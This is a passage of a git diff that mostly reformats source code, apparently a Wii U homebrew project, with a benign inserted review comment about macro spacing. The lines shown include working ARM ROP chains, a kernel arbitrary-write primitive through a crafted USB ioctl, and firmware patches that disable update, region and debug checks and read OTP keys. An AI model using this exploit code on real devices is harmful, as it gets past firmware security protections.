our code destination address - 0x0, // 0x1EC - 0x0, // 0x1F0 - 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} - 0x0, // 0x1F8 - sizeof(ios_kernel), // 0x1FC our code size - 0x0, // 0x200 - 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} - 0x00140000, // 0x208 our code source location - 0x08131D04, // 0x20C KERNEL_MEMCPY address - 0x0, // 0x210 - 0x0, // 0x214 
- 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) + 0x4001, // 0x1E0 on > 0x4000 it flushes all data caches + 0x0, // 0x1E0 + 0x1012ED4C, // 0x1E4 IOS_FlushDCache(void *ptr, unsigned int len) + 0x0, // 0x1DC + 0x0, // 0x1E0 + 0x10123a9f, // 0x1E4 POP {R0,R1,R4,PC} + ARM_CODE_BASE, // 0x1E8 our code destination address + 0x0, // 0x1EC + 0x0, // 0x1F0 + 0x101063db, // 0x1F4 POP {R1,R2,R5,PC} + 0x0, // 0x1F8 + sizeof(ios_kernel), // 0x1FC our code size + 0x0, // 0x200 + 0x10123983, // 0x204 POP {R1,R3,R4,R6,PC} + 0x00140000, // 0x208 our code source location + 0x08131D04, // 0x20C KERNEL_MEMCPY address + 0x0, // 0x210 + 0x0, // 0x214 + 0x1012EBB4, // 0x218 IOS_GetUpTime64 (privileged stack pivot) 0x0, 0x0, 0x101312D0, }; static const int second_chain[] = { - 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} - CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination - 0x0, // 0x08 - 0x0, // 0x0C - 0x101063db, // 0x10 POP {R1,R2,R5,PC} - 0x00130000, // 0x14 source - sizeof(final_chain), // 0x18 length - 0x0, // 0x1C - 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x24 - 0x0, // 0x28 - 0x101236f3, // 0x2C POP {R1-R7,PC} - 0x0, // 0x30 arg - 0x101001DC, // 0x34 stackptr - 0x68, // 0x38 stacksize - 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} - 0x0, // 0x40 - 0x0, // 0x44 - 0x0, // 0x48 - 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} - 0x0, // 0x50 - 0x0, // 0x54 - 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} - 0x0, // 0x5C - 0x0, // 0x60 - IOS_CREATETHREAD, // 0x64 - 0x1, // 0x68 priority - 0x2, // 0x6C flags - 0x0, // 0x70 - 0x0, // 0x74 - 0x101063db, // 0x78 POP {R1,R2,R5,PC} - 0x0, // 0x7C - -(0x240 + 0x18 + 0xF000), // 0x80 stack offset - 0x0, // 0x84 - 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} + 0x10123a9f, // 0x00 POP {R0,R1,R4,PC} + CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000, // 0x04 destination + 0x0, // 0x08 + 0x0, // 0x0C + 
0x101063db, // 0x10 POP {R1,R2,R5,PC} + 0x00130000, // 0x14 source + sizeof(final_chain), // 0x18 length + 0x0, // 0x1C + 0x10106D4C, // 0x20 BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x24 + 0x0, // 0x28 + 0x101236f3, // 0x2C POP {R1-R7,PC} + 0x0, // 0x30 arg + 0x101001DC, // 0x34 stackptr + 0x68, // 0x38 stacksize + 0x10101634, // 0x3C proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x40 + 0x0, // 0x44 + 0x0, // 0x48 + 0x1010388C, // 0x4C CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC} + 0x0, // 0x50 + 0x0, // 0x54 + 0x1012CFEC, // 0x58 MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC} + 0x0, // 0x5C + 0x0, // 0x60 + IOS_CREATETHREAD, // 0x64 + 0x1, // 0x68 priority + 0x2, // 0x6C flags + 0x0, // 0x70 + 0x0, // 0x74 + 0x101063db, // 0x78 POP {R1,R2,R5,PC} + 0x0, // 0x7C + -(0x240 + 0x18 + 0xF000), // 0x80 stack offset + 0x0, // 0x84 + 0x101141C0, // 0x88 MOV R0, R9; ADD SP, SP, #0xC; LDMFD SP!, {R4-R11,PC} 0x0, 0x0, 0x0, 0x00110000 - 0x44, // 0x8C 0x00110010, // 0x90 - 0x0, // 0x94 - 0x0, // 0x98 - 0x0, // 0x9C - 0x0, // 0xA0 - 0x0, // 0xA4 - 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack - 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} + 0x0, // 0x94 + 0x0, // 0x98 + 0x0, // 0x9C + 0x0, // 0xA0 + 0x0, // 0xA4 + 0x4, // 0xA8 R11 must equal 4 in order to pivot the stack + 0x101088F4, // STR R0, [R4,#0x44]; MOVEQ R0, R5; STRNE R3, [R5]; LDMFD SP!, {R4,R5,PC} 0x0, 0x0, 0x1012EA68, // 0xAC stack pivot @@ -313,10 +313,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) { memcpy((char *) (0xF4140000), ios_kernel, sizeof(ios_kernel)); payload_info_t *payloads = (payload_info_t *) 0xF4148000; - payloads->size = sizeof(ios_usb); + payloads->size = sizeof(ios_usb); memcpy(payloads->data, ios_usb, payloads->size); - payloads = (payload_info_t *) 0xF4160000; + payloads = (payload_info_t *) 0xF4160000; payloads->size = sizeof(ios_mcp); memcpy(payloads->data, ios_mcp, payloads->size); 
@@ -331,10 +331,10 @@ static void uhs_exploit_init(int dev_uhs_0_handle) { } static int uhs_write32(int dev_uhs_0_handle, int arm_addr, int val) { - ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes - DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) - OSSleepTicks(0x200000); //! Improves stability - int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 + ayylmao[520] = arm_addr - 24; //! The address to be overwritten, minus 24 bytes + DCStoreRange(ayylmao, 521 * 4); //! Make CPU fetch new data (with updated adress) + OSSleepTicks(0x200000); //! Improves stability + int request_buffer[] = {-(0xBEA2C), val}; //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1 int output_buffer[32]; return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer)); } diff --git a/source/ios_kernel/source/elf_abi.h b/source/ios_kernel/source/elf_abi.h index 4d9c796..aa119af 100644 --- a/source/ios_kernel/source/elf_abi.h +++ b/source/ios_kernel/source/elf_abi.h @@ -1,3 +1,4 @@ +// clang-format off /* * Copyright (c) 1995, 1996, 2001, 2002 * Erik Theisen. All rights reserved. diff --git a/source/ios_kernel/source/elf_patcher.c b/source/ios_kernel/source/elf_patcher.c index 45faa91..2b33733 100644 --- a/source/ios_kernel/source/elf_patcher.c +++ b/source/ios_kernel/source/elf_patcher.c @@ -21,16 +21,14 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "types.h" #include "elf_abi.h" +#include "types.h" #include "utils.h" static Elf32_Phdr *get_section(u32 data, u32 vaddr) { Elf32_Ehdr *ehdr = (Elf32_Ehdr *) data; - if (!IS_ELF (*ehdr) - || (ehdr->e_type != ET_EXEC) - || (ehdr->e_machine != EM_ARM)) { + if (!IS_ELF(*ehdr) || (ehdr->e_type != ET_EXEC) || (ehdr->e_machine != EM_ARM)) { return 0; } 
diff --git a/source/ios_kernel/source/elf_patcher.h b/source/ios_kernel/source/elf_patcher.h index 1be026f..b860b44 100644 --- a/source/ios_kernel/source/elf_patcher.h +++ b/source/ios_kernel/source/elf_patcher.h @@ -26,10 +26,10 @@ #include "types.h" -#define ARM_B(addr, func) (0xEA000000 | ((((u32)(func) - (u32)(addr) - 8) >> 2) & 0x00FFFFFF)) // +-32MB -#define ARM_BL(addr, func) (0xEB000000 | ((((u32)(func) - (u32)(addr) - 8) >> 2) & 0x00FFFFFF)) // +-32MB -#define THUMB_B(addr, func) ((0xE000 | ((((u32)(func) - (u32)(addr) - 4) >> 1) & 0x7FF))) // +-2KB -#define THUMB_BL(addr, func) ((0xF000F800 | ((((u32)(func) - (u32)(addr) - 4) >> 1) & 0x0FFF)) | ((((u32)(func) - (u32)(addr) - 4) << 4) & 0x7FFF000)) // +-4MB +#define ARM_B(addr, func) (0xEA000000 | ((((u32) (func) - (u32) (addr) -8) >> 2) & 0x00FFFFFF)) // +-32MB +#define ARM_BL(addr, func) (0xEB000000 | ((((u32) (func) - (u32) (addr) -8) >> 2) & 0x00FFFFFF)) // +-32MB +#define THUMB_B(addr, func) ((0xE000 | ((((u32) (func) - (u32) (addr) -4) >> 1) & 0x7FF))) // +-2KB +#define THUMB_BL(addr, func) ((0xF000F800 | ((((u32) (func) - (u32) (addr) -4) >> 1) & 0x0FFF)) | ((((u32) (func) - (u32) (addr) -4) << 4) & 0x7FFF000)) // +-4MB typedef struct { u32 address; diff --git a/source/ios_kernel/source/fsa.c b/source/ios_kernel/source/fsa.c index a17b3d8..6f8529e 100644 --- a/source/ios_kernel/source/fsa.c +++ b/source/ios_kernel/source/fsa.c 
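Review bot: The reformatted `ARM_B`/`ARM_BL`/`THUMB_B`/`THUMB_BL` macros now read `(u32) (addr) -8` and `(u32) (addr) -4`, which clang-format produced because it cannot tell whether `(addr)` is a cast target or an operand, so the binary subtraction is printed as if it were a unary minus. The value is unchanged (it is still `... - 8` as an expression), but the rendering invites a wrong reading of the branch-offset arithmetic and will be re-mangled on every format run. Wrapping the difference in its own parentheses keeps the formatter from misparsing it, e.g. `#define ARM_B(addr, func) (0xEA000000 | (((((u32) (func) - (u32) (addr)) - 8) >> 2) & 0x00FFFFFF)) // +-32MB`, with the same change on the other three lines; alternatively these could become `static inline u32` helpers, which the formatter handles unambiguously.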
@@ -24,13 +24,13 @@ #include "types.h" #include "utils.h" -#define svcAlloc ((void *(*)(u32 heapid, u32 size))0x081234E4) -#define svcAllocAlign ((void *(*)(u32 heapid, u32 size, u32 align))0x08123464) -#define svcFree ((void *(*)(u32 heapid, void *ptr))0x08123830) -#define svcOpen ((int (*)(const char* name, int mode))0x0812940C) -#define svcClose ((int (*)(int fd))0x08129368) -#define svcIoctl ((int (*)(int fd, u32 request, void* input_buffer, u32 input_buffer_len, void* output_buffer, u32 output_buffer_len))0x081290E0) -#define svcIoctlv ((int (*)(int fd, u32 request, u32 vector_count_in, u32 vector_count_out, iovec_s* vector))0x0812903C) +#define svcAlloc ((void *(*) (u32 heapid, u32 size)) 0x081234E4) +#define svcAllocAlign ((void *(*) (u32 heapid, u32 size, u32 align)) 0x08123464) +#define svcFree ((void *(*) (u32 heapid, void *ptr)) 0x08123830) +#define svcOpen ((int (*)(const char *name, int mode)) 0x0812940C) +#define svcClose ((int (*)(int fd)) 0x08129368) +#define svcIoctl ((int (*)(int fd, u32 request, void *input_buffer, u32 input_buffer_len, void *output_buffer, u32 output_buffer_len)) 0x081290E0) +#define svcIoctlv ((int (*)(int fd, u32 request, u32 vector_count_in, u32 vector_count_out, iovec_s *vector)) 0x0812903C) typedef struct { void *ptr; @@ -73,8 +73,8 @@ static int FSA_Close(int fd) { } static int FSA_RawOpen(int fd, const char *device_path, int *outHandle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; kernel_strncpy((char *) &inbuf[0x01], device_path, 0x27F); @@ -88,8 +88,8 @@ static int FSA_RawOpen(int fd, const char *device_path, int *outHandle) { } static int FSA_RawClose(int fd, int device_handle) { - u8 *iobuf = allocIobuf(); - u32 *inbuf = (u32 *) iobuf; + u8 *iobuf = allocIobuf(); + u32 *inbuf = (u32 *) iobuf; u32 *outbuf = (u32 *) &iobuf[0x520]; inbuf[1] = device_handle; 
@@ -101,12 +101,12 @@ static int FSA_RawClose(int fd, int device_handle) { } static int FSA_RawRead(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_offset, int device_handle) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; // note : offset_bytes = blocks_offset * size_bytes inbuf[0x08 / 4] = (blocks_offset >> 32); @@ -131,12 +131,12 @@ static int FSA_RawRead(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_o } static int FSA_RawWrite(int fd, void *data, u32 size_bytes, u32 cnt, u64 blocks_offset, int device_handle) { - u8 *iobuf = allocIobuf(); - u8 *inbuf8 = iobuf; - u8 *outbuf8 = &iobuf[0x520]; + u8 *iobuf = allocIobuf(); + u8 *inbuf8 = iobuf; + u8 *outbuf8 = &iobuf[0x520]; iovec_s *iovec = (iovec_s *) &iobuf[0x7C0]; - u32 *inbuf = (u32 *) inbuf8; - u32 *outbuf = (u32 *) outbuf8; + u32 *inbuf = (u32 *) inbuf8; + u32 *outbuf = (u32 *) outbuf8; inbuf[0x08 / 4] = (blocks_offset >> 32); inbuf[0x0C / 4] = (blocks_offset & 0xFFFFFFFF); @@ -218,4 +218,3 @@ int FSA_SDWriteRawSectors(const void *buffer, u32 sector, u32 num_sectors) { return res; } - diff --git a/source/ios_kernel/source/fsa.h b/source/ios_kernel/source/fsa.h index c12f663..2df262b 100644 --- a/source/ios_kernel/source/fsa.h +++ b/source/ios_kernel/source/fsa.h 
@@ -26,25 +26,25 @@ #include "types.h" -#define NAND_DUMP_SIGNATURE_SECTOR 0x01 -#define NAND_MAX_DESC_TYPES 5 +#define NAND_DUMP_SIGNATURE_SECTOR 0x01 +#define NAND_MAX_DESC_TYPES 5 -#define NAND_DUMP_SIGNATURE 0x4841585844554d50ULL // HAXXDUMP +#define NAND_DUMP_SIGNATURE 0x4841585844554d50ULL // HAXXDUMP -#define NAND_DESC_TYPE_SLC 0x534c4320 // 'SLC ' -#define NAND_DESC_TYPE_SLCCMPT 0x534c4332 // 'SLC2' -#define NAND_DESC_TYPE_MLC 0x4d4c4320 // 'MLC ' -#define NAND_DESC_TYPE_SEEPROM 0x45455052 // 'EEPR' -#define NAND_DESC_TYPE_OTP 0x4f545020 // 'OTP ' +#define NAND_DESC_TYPE_SLC 0x534c4320 // 'SLC ' +#define NAND_DESC_TYPE_SLCCMPT 0x534c4332 // 'SLC2' +#define NAND_DESC_TYPE_MLC 0x4d4c4320 // 'MLC ' +#define NAND_DESC_TYPE_SEEPROM 0x45455052 // 'EEPR' +#define NAND_DESC_TYPE_OTP 0x4f545020 // 'OTP ' typedef struct _stdio_nand_desc_t { - u32 nand_type; // nand type - u32 base_sector; // base sector of dump - u32 sector_count; // sector count in SDIO sectors + u32 nand_type; // nand type + u32 base_sector; // base sector of dump + u32 sector_count; // sector count in SDIO sectors } __attribute__((packed)) stdio_nand_desc_t; typedef struct _sdio_nand_signature_sector_t { - u64 signature; // HAXXDUMP + u64 signature; // HAXXDUMP stdio_nand_desc_t nand_descriptions[NAND_MAX_DESC_TYPES]; } __attribute__((packed)) sdio_nand_signature_sector_t; diff --git a/source/ios_kernel/source/instant_patches.c b/source/ios_kernel/source/instant_patches.c index 606c960..967b3dc 100644 --- a/source/ios_kernel/source/instant_patches.c +++ b/source/ios_kernel/source/instant_patches.c 
@@ -21,12 +21,12 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "utils.h" -#include "types.h" -#include "elf_patcher.h" -#include "kernel_patches.h" -#include "ios_mcp_patches.h" #include "../../ios_mcp/ios_mcp_syms.h" +#include "elf_patcher.h" +#include "ios_mcp_patches.h" +#include "kernel_patches.h" +#include "types.h" +#include "utils.h" typedef struct { u32 paddr; @@ -37,9 +37,9 @@ typedef struct { u32 cached; } ios_map_shared_info_t; -#define mcp_rodata_phys(addr) ((u32)(addr) - 0x05060000 + 0x08220000) -#define mcp_data_phys(addr) ((u32)(addr) - 0x05074000 + 0x08234000) -#define acp_phys(addr) ((u32)(addr) - 0xE0000000 + 0x12900000) +#define mcp_rodata_phys(addr) ((u32) (addr) -0x05060000 + 0x08220000) +#define mcp_data_phys(addr) ((u32) (addr) -0x05074000 + 0x08234000) +#define acp_phys(addr) ((u32) (addr) -0xE0000000 + 0x12900000) void instant_patches_setup(void) { // apply IOS ELF launch hook @@ -62,13 +62,13 @@ void instant_patches_setup(void) { *(volatile u32 *) 0x081430B4 = 1; // fix 10 minute timeout that crashes MCP after 10 minutes of booting - *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT + *(volatile u32 *) (0x05022474 - 0x05000000 + 0x081C0000) = 0xFFFFFFFF; // NEW_TIMEOUT kernel_memset((void *) (0x050BD000 - 0x05000000 + 0x081C0000), 0, 0x2F00); // allow custom bootLogoTex and bootMovie.h264 - *(volatile u32 *) (0xE0030D68 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 - *(volatile u32 *) (0xE0030D34 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 + *(volatile u32 *) (0xE0030D68 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 + *(volatile u32 *) (0xE0030D34 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 // Patch update check *(volatile u32 *) (0xe22830e0 - 0xe2280000 + 0x13140000) = 0x00000000; 
@@ -76,9 +76,9 @@ void instant_patches_setup(void) { *(volatile u32 *) (0xe204fb68 - 0xe2000000 + 0x12EC0000) = 0xe3a00000; // allow any region title launch - *(volatile u32 *) (0xE0030498 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 + *(volatile u32 *) (0xE0030498 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 // Patch CheckTitleLaunch to ignore gamepad connected result - *(volatile u32 *) (0xE0030868 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 + *(volatile u32 *) (0xE0030868 - 0xE0000000 + 0x12900000) = 0xE3A00000; // mov r0, #0 *(volatile u32 *) (0x050254D6 - 0x05000000 + 0x081C0000) = THUMB_BL(0x050254D6, MCP_LoadFile_patch); *(volatile u32 *) (0x05025242 - 0x05000000 + 0x081C0000) = THUMB_BL(0x05025242, MCP_ioctl100_patch); 
@@ -110,19 +110,19 @@ void instant_patches_setup(void) { *(volatile u32 *) (0x050BC580 - 0x05000000 + 0x081C0000) = 0; ios_map_shared_info_t map_info; - map_info.paddr = 0x050BD000 - 0x05000000 + 0x081C0000; - map_info.vaddr = 0x050BD000; - map_info.size = 0x3000; - map_info.domain = 1; // MCP - map_info.type = 3; // 0 = undefined, 1 = kernel only, 2 = read only, 3 = read/write + map_info.paddr = 0x050BD000 - 0x05000000 + 0x081C0000; + map_info.vaddr = 0x050BD000; + map_info.size = 0x3000; + map_info.domain = 1; // MCP + map_info.type = 3; // 0 = undefined, 1 = kernel only, 2 = read only, 3 = read/write map_info.cached = 0xFFFFFFFF; - _iosMapSharedUserExecution(&map_info); // actually a bss section but oh well it will have read/write + _iosMapSharedUserExecution(&map_info); // actually a bss section but oh well it will have read/write - map_info.paddr = 0x05116000 - 0x05100000 + 0x13D80000; - map_info.vaddr = 0x05116000; - map_info.size = 0x4000; - map_info.domain = 1; // MCP - map_info.type = 3; // 0 = undefined, 1 = kernel only, 2 = read only, 3 = read write + map_info.paddr = 0x05116000 - 0x05100000 + 0x13D80000; + map_info.vaddr = 0x05116000; + map_info.size = 0x4000; + map_info.domain = 1; // MCP + map_info.type = 3; // 0 = undefined, 1 = kernel only, 2 = read only, 3 = read write map_info.cached = 0xFFFFFFFF; _iosMapSharedUserExecution(&map_info); } diff --git a/source/ios_kernel/source/ios_mcp_patches.c b/source/ios_kernel/source/ios_mcp_patches.c index 3f09cbd..79a6780 100644 --- a/source/ios_kernel/source/ios_mcp_patches.c +++ b/source/ios_kernel/source/ios_mcp_patches.c 
@@ -21,13 +21,13 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "types.h" -#include "elf_patcher.h" #include "ios_mcp_patches.h" #include "../../ios_mcp/ios_mcp.bin.h" #include "../../ios_mcp/ios_mcp_syms.h" +#include "elf_patcher.h" +#include "types.h" -#define MCP_CODE_BASE_PHYS_ADDR (-0x05100000 + 0x13D80000) +#define MCP_CODE_BASE_PHYS_ADDR (-0x05100000 + 0x13D80000) extern const patch_table_t mcp_patches_table[]; extern const patch_table_t mcp_patches_table_end[]; diff --git a/source/ios_kernel/source/ios_mcp_patches.h b/source/ios_kernel/source/ios_mcp_patches.h index 75b9729..eb5b9d9 100644 --- a/source/ios_kernel/source/ios_mcp_patches.h +++ b/source/ios_kernel/source/ios_mcp_patches.h @@ -24,7 +24,9 @@ #ifndef _MCP_PATCHES_H_ #define _MCP_PATCHES_H_ -#define MCP_LAUNCH_IMG_PHYS_ADDR (0x27000000) +#include "types.h" + +#define MCP_LAUNCH_IMG_PHYS_ADDR (0x27000000) u32 mcp_get_phys_code_base(void); diff --git a/source/ios_kernel/source/kernel_patches.c b/source/ios_kernel/source/kernel_patches.c index 43590b6..eaa528f 100644 --- a/source/ios_kernel/source/kernel_patches.c +++ b/source/ios_kernel/source/kernel_patches.c @@ -21,14 +21,14 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ -#include "types.h" +#include "kernel_patches.h" #include "../../common/kernel_commands.h" #include "elf_patcher.h" -#include "ios_mcp_patches.h" -#include "kernel_patches.h" #include "fsa.h" -#include "utils.h" +#include "ios_mcp_patches.h" #include "thread.h" +#include "types.h" +#include "utils.h" extern void __KERNEL_CODE_START(void); 
@@ -40,24 +40,24 @@ extern const patch_table_t kernel_patches_table_end[]; static const u32 mcpIoMappings_patch[] = { // vaddr paddr size ? ? ? - 0x0D000000, 0x0D000000, 0x001C0000, 0x00000000, 0x00000003, 0x00000000, // mapping 1 - 0x0D800000, 0x0D800000, 0x001C0000, 0x00000000, 0x00000003, 0x00000000, // mapping 2 - 0x0C200000, 0x0C200000, 0x00100000, 0x00000000, 0x00000003, 0x00000000 // mapping 3 - }; + 0x0D000000, 0x0D000000, 0x001C0000, 0x00000000, 0x00000003, 0x00000000, // mapping 1 + 0x0D800000, 0x0D800000, 0x001C0000, 0x00000000, 0x00000003, 0x00000000, // mapping 2 + 0x0C200000, 0x0C200000, 0x00100000, 0x00000000, 0x00000003, 0x00000000 // mapping 3 +}; static const u32 KERNEL_MCP_IOMAPPINGS_STRUCT[] = { - (u32) mcpIoMappings_patch, // ptr to iomapping structs - 0x00000003, // number of iomappings - 0x00000001 // pid (MCP) - }; + (u32) mcpIoMappings_patch, // ptr to iomapping structs + 0x00000003, // number of iomappings + 0x00000001 // pid (MCP) +}; -ThreadContext_t** currentThreadContext = (ThreadContext_t**) 0x08173ba0; -uint32_t* domainAccessPermissions = (uint32_t*) 0x081a4000; +ThreadContext_t **currentThreadContext = (ThreadContext_t **) 0x08173ba0; +uint32_t *domainAccessPermissions = (uint32_t *) 0x081a4000; int kernel_syscall_0x81(u32 command, u32 arg1, u32 arg2, u32 arg3) { int result = 0; - int level = disable_interrupts(); + int level = disable_interrupts(); set_domain_register(domainAccessPermissions[0]); // 0 = KERNEL switch (command) { @@ -78,8 +78,8 @@ int kernel_syscall_0x81(u32 command, u32 arg1, u32 arg2, u32 arg3) { break; } case KERNEL_READ_OTP: { - int (*read_otp_internal)(int index, void* out_buf, u32 size) = (int (*)(int, void*, u32)) 0x08120248; - read_otp_internal(0, (void*)(arg1), 0x400); + int (*read_otp_internal)(int index, void *out_buf, u32 size) = (int (*)(int, void *, u32)) 0x08120248; + read_otp_internal(0, (void *) (arg1), 0x400); break; } default: { 
@@ -98,7 +98,7 @@ void kernel_launch_ios(u32 launch_address, u32 L, u32 C, u32 H) { void (*kernel_launch_bootrom)(u32 launch_address, u32 L, u32 C, u32 H) = (void *) 0x0812A050; if (*(u32 *) (launch_address - 0x300 + 0x1AC) == 0x00DFD000) { - int level = disable_interrupts(); + int level = disable_interrupts(); unsigned int control_register = disable_mmu(); u32 ios_elf_start = launch_address + 0x804 - 0x300; @@ -129,23 +129,23 @@ void kernel_run_patches(u32 ios_elf_start) { section_write_word(ios_elf_start, 0xe22830e0, 0x00000000); section_write_word(ios_elf_start, 0xe22b2a78, 0x00000000); section_write_word(ios_elf_start, 0xe204fb68, 0xe3a00000); - + // patch MCP syslog debug mode check section_write_word(ios_elf_start, 0x050290d8, 0x20004770); - + // Write magic word to disable custom IPC section_write_word(ios_elf_start, 0x050290dc, 0x42424242); - + // give us bsp::ee:read permission for PPC section_write_word(ios_elf_start, 0xe6044db0, 0x000001F0); - + // patch TEST debug mode check //section_write_word(ios_elf_start, 0xe4016a78, 0xe3a00000); section_write_word(ios_elf_start, 0xe4007828, 0xe3a00000); - + // Patch FS to syslog everything section_write_word(ios_elf_start, 0x107F5720, ARM_B(0x107F5720, 0x107F0C84)); - + // Patch MCP to syslog everything section_write_word(ios_elf_start, 0x05055438, ARM_B(0x05055438, 0x0503dcf8)); @@ -154,4 +154,3 @@ void kernel_run_patches(u32 ios_elf_start) { u32 patch_count = (u32) (((u8 *) kernel_patches_table_end) - ((u8 *) kernel_patches_table)) / sizeof(patch_table_t); patch_table_entries(ios_elf_start, kernel_patches_table, patch_count); } - diff --git a/source/ios_kernel/source/kernel_patches.h b/source/ios_kernel/source/kernel_patches.h index 03240fd..f8a05a8 100644 --- a/source/ios_kernel/source/kernel_patches.h +++ b/source/ios_kernel/source/kernel_patches.h 
@@ -24,6 +24,8 @@ #ifndef _KERNEL_PATCHES_H #define _KERNEL_PATCHES_H +#include "types.h" + int kernel_init_otp_buffer(u32 sd_sector, int tagValid); int kernel_syscall_0x81(u32 command, u32 arg1, u32 arg2, u32 arg3); diff --git a/source/ios_kernel/source/main.c b/source/ios_kernel/source/main.c index 4f16032..095a734 100644 --- a/source/ios_kernel/source/main.c +++ b/source/ios_kernel/source/main.c @@ -21,18 +21,19 @@ * 3. This notice may not be removed or altered from any source * distribution. ***************************************************************************/ +#include "instant_patches.h" +#include "ios_mcp_patches.h" #include "types.h" #include "utils.h" -#include "ios_mcp_patches.h" -#include "instant_patches.h" -#define USB_PHYS_CODE_BASE 0x101312D0 +#define USB_PHYS_CODE_BASE 0x101312D0 typedef struct { u32 size; u8 data[0]; } payload_info_t; +// clang-format off static const char repairData_set_fault_behavior[] = { 0xE1, 0x2F, 0xFF, 0x1E, 0xE9, 0x2D, 0x40, 0x30, 0xE5, 0x93, 0x20, 0x00, 0xE1, 0xA0, 0x40, 0x00, 0xE5, 0x92, 0x30, 0x54, 0xE1, 0xA0, 0x50, 0x01, 0xE3, 0x53, 0x00, 0x01, 0x0A, 0x00, 0x00, 0x02, @@ -56,11 +57,12 @@ static const char repairData_usb_root_thread[] = { 0xE2, 0x4D, 0xDE, 0x17, 0xEB, 0x00, 0xB9, 0x92, 0xE3, 0xA0, 0x10, 0x00, 0xE3, 0xA0, 0x20, 0x03, 0xE5, 0x9F, 0x0E, 0x68, 0xEB, 0x00, 0xB3, 0x20, }; +// clang-format on int _main() { - void (*invalidate_icache)() = (void (*)()) 0x0812DCF0; + void (*invalidate_icache)() = (void (*)()) 0x0812DCF0; void (*invalidate_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120164; - void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160; + void (*flush_dcache)(unsigned int, unsigned int) = (void (*)()) 0x08120160; flush_dcache(0x081200F0, 0x4001); // giving a size >= 0x4000 flushes all cache diff --git a/source/ios_kernel/source/thread.h b/source/ios_kernel/source/thread.h index 65d41ab..4d10d2a 100644 --- a/source/ios_kernel/source/thread.h 
+++ b/source/ios_kernel/source/thread.h @@ -1,14 +1,14 @@ #pragma once -#include #include +#include typedef struct ThreadContext { uint32_t cspr; uint32_t gpr[14]; uint32_t lr; uint32_t pc; - struct ThreadContext* threadQueueNext; + struct ThreadContext *threadQueueNext; uint32_t maxPriority; uint32_t priority; uint32_t state; @@ -16,18 +16,18 @@ typedef struct ThreadContext { uint32_t id; uint32_t flags; uint32_t exitValue; - struct ThreadContext** joinQueue; - struct ThreadContext** threadQueue; + struct ThreadContext **joinQueue; + struct ThreadContext **threadQueue; uint8_t unk1[56]; - void* stackPointer; + void *stackPointer; uint8_t unk2[8]; - void* sysStackAddr; - void* userStackAddr; + void *sysStackAddr; + void *userStackAddr; uint32_t userStackSize; - void* threadLocalStorage; + void *threadLocalStorage; uint32_t profileCount; uint32_t profileTime; } ThreadContext_t; static_assert(sizeof(ThreadContext_t) == 0xC8, "ThreadContext_t: different size than expected"); -extern ThreadContext_t** currentThreadContext; +extern ThreadContext_t **currentThreadContext; diff --git a/source/ios_kernel/source/utils.c b/source/ios_kernel/source/utils.c index 03cd42f..a1b1b42 100644 --- a/source/ios_kernel/source/utils.c +++ b/source/ios_kernel/source/utils.c @@ -30,7 +30,7 @@ void reverse_memcpy(void *dst, const void *src, unsigned int size) { if ((size >= 4) && !((dst - src) & 3)) { const unsigned int *src_p32; unsigned int *dst_p32; - unsigned int endDst = ((unsigned int) 